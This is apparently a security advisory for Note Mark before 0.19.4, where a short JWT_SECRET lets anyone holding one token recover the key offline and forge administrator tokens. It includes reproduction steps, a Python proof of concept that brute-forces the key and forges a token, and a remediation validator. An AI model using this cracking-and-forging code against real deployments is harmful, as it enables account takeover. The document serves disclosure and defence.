Note Mark JWT Secret Weakness Allows Full Account Takeover via Token Forgery
Vulnerability
A vulnerability in Note Mark, an open-source note-taking application, prior to version 0.19.4, allows full account takeover through token forgery. The application does not enforce a minimum length or entropy for the JWT_SECRET configuration value: any base64-decodable value is accepted, including one that decodes to a single byte. Because a JWT's HMAC signature is computed over the header and payload that every holder of the token can read, a short key can be recovered by exhaustively trying every candidate key against one captured token (a 1-byte key has only 256 possibilities). The search runs entirely offline, so the server sees no failed attempts and neither rate limiting nor detection applies. With the key in hand, an attacker can forge tokens for any user, including administrators, and authenticate without credentials, which makes this vulnerability critical.
Impact
An attacker who captures any valid JWT can crack the signing secret offline, forge JWTs for any user ID (including administrators), and authenticate without knowing any credentials, leading to full account takeover across the application.
Reproduction
To reproduce this vulnerability, deploy Note Mark with a JWT_SECRET that decodes to fewer than 32 bytes (for instance a single byte). Authenticate as any user and capture the issued JWT. Run an offline brute-force or dictionary attack against the token's signature to recover the secret; a JWT-aware cracker such as hashcat (mode 16500) or a short script that iterates candidate keys and recomputes the HMAC over the header.payload portion is sufficient. With the secret recovered, mint a JWT carrying a different user ID (for example the administrator's), sign it with the secret, and present it to a protected endpoint; the server accepts it because the signature verifies.
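The procedure above as an added Python example; this is not Note Mark's code or tooling, and the HS256 algorithm, the claim name sub, the user IDs and the exp value are assumptions made for illustration. It mints a token under a constructed one-byte secret, recovers that key by exhaustive search against the captured token's signature (only the standard library is used), and forges a token for another user that the same verifier accepts.

```python
import base64
import hashlib
import hmac
import itertools
import json
from typing import Optional

# Constructed scenario (not Note Mark's real config or claim layout): the operator
# set JWT_SECRET to the base64 of the single byte 0x2a and the application
# decoded and used it as the HMAC key without complaint.
WEAK_JWT_SECRET = "Kg=="                        # base64("*")
SERVER_KEY = base64.b64decode(WEAK_JWT_SECRET)  # b"*": one byte of key material

# Assumed claim layout: "sub" carries the numeric user ID. A fixed exp keeps the
# sample token deterministic.
VICTIM_CLAIMS = {"sub": 7, "exp": 4102444800}
ADMIN_USER_ID = 1  # assumption: the first account is the administrator


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(claims: dict, key: bytes) -> str:
    """Mint a compact JWT the way an HS256 server would."""
    header = {"alg": "HS256", "typ": "JWT"}
    parts = [json.dumps(header, separators=(",", ":")).encode(),
             json.dumps(claims, separators=(",", ":")).encode()]
    signing_input = ".".join(b64url(p) for p in parts)
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"


def verify_hs256(token: str, key: bytes) -> bool:
    """Server-side check: recompute the HMAC and compare in constant time."""
    signing_input, sig_b64 = token.rsplit(".", 1)
    expected = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def decode_claims(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[1]))


def crack_hs256(token: str, max_key_len: int = 2) -> Optional[bytes]:
    """Offline exhaustive search over every key of 1..max_key_len bytes.

    Nothing here touches the server: header.payload is the HMAC message and
    the third segment is the HMAC tag, so one captured token is all that is
    needed. A 1-byte key has 256 candidates and a 2-byte key 65,536; a
    32-byte key (2**256 candidates) is out of reach for this approach.
    HMAC zero-pads short keys, so b"*" and b"*\x00" sign identically; the
    shortest equivalent key is found first and is what gets returned.
    """
    signing_input, sig_b64 = token.rsplit(".", 1)
    msg = signing_input.encode()
    target = b64url_decode(sig_b64)
    for n in range(1, max_key_len + 1):
        for candidate in itertools.product(range(256), repeat=n):
            key = bytes(candidate)
            if hmac.compare_digest(hmac.new(key, msg, hashlib.sha256).digest(), target):
                return key
    return None


def forge_token(key: bytes, user_id: int) -> str:
    """With the recovered key, mint a token for any user ID."""
    return sign_hs256({"sub": user_id, "exp": 4102444800}, key)


VICTIM_TOKEN = sign_hs256(VICTIM_CLAIMS, SERVER_KEY)  # what the attacker captured

if __name__ == "__main__":
    recovered = crack_hs256(VICTIM_TOKEN)
    print("recovered key:", recovered)
    forged = forge_token(recovered, ADMIN_USER_ID)
    print("server accepts forged admin token:", verify_hs256(forged, SERVER_KEY))
    print("forged claims:", decode_claims(forged))
```

The script brute-forces raw key bytes rather than base64 strings because that is what the server actually feeds to the HMAC; for a dictionary attack against secrets that were set as readable strings, the same loop would iterate over wordlist entries instead of itertools.product.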
Remediation
Users are advised to update to Note Mark version 0.19.4 or later, where this vulnerability has been fixed. Operators should also ensure that JWT_SECRET is at least 32 bytes (256 bits) after base64 decoding and generated from a cryptographically secure random source, and that the application rejects weaker values during configuration parsing, so that it refuses to start rather than silently accepting a short key.
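A startup check of the kind the remediation describes, as an added Python example that is not Note Mark's code: it decodes JWT_SECRET, rejects invalid base64 and anything that decodes to fewer than 32 bytes, and generates a compliant value from the OS CSPRNG. The function names and the MIN_SECRET_BYTES constant are illustrative; the check is on the decoded bytes, so a long-looking base64 string that decodes to a few bytes is still rejected.

```python
import base64
import binascii
import secrets

MIN_SECRET_BYTES = 32  # 256 bits, matching the HS256 output size


def parse_jwt_secret(value: str) -> bytes:
    """Decode JWT_SECRET during config parsing and refuse weak values.

    Raises ValueError (and so aborts startup) instead of accepting a key
    that an attacker could recover offline from a single captured token.
    """
    try:
        key = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError) as exc:
        raise ValueError("JWT_SECRET is not valid base64") from exc
    if len(key) < MIN_SECRET_BYTES:
        raise ValueError(
            f"JWT_SECRET decodes to {len(key)} bytes; at least {MIN_SECRET_BYTES} are required"
        )
    return key


def is_acceptable_secret(value: str) -> bool:
    """Boolean wrapper around parse_jwt_secret for config linting."""
    try:
        parse_jwt_secret(value)
    except ValueError:
        return False
    return True


def generate_jwt_secret() -> str:
    """Produce a compliant value, ready to paste into the configuration."""
    return base64.b64encode(secrets.token_bytes(MIN_SECRET_BYTES)).decode()


if __name__ == "__main__":
    # Constructed samples: the one-byte secret from the advisory, a 12-byte
    # human-chosen string ("short-secret"), and a freshly generated key.
    for sample in ["Kg==", "c2hvcnQtc2VjcmV0", generate_jwt_secret()]:
        verdict = "accepted" if is_acceptable_secret(sample) else "rejected"
        print(f"{sample!r}: {verdict}")
```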
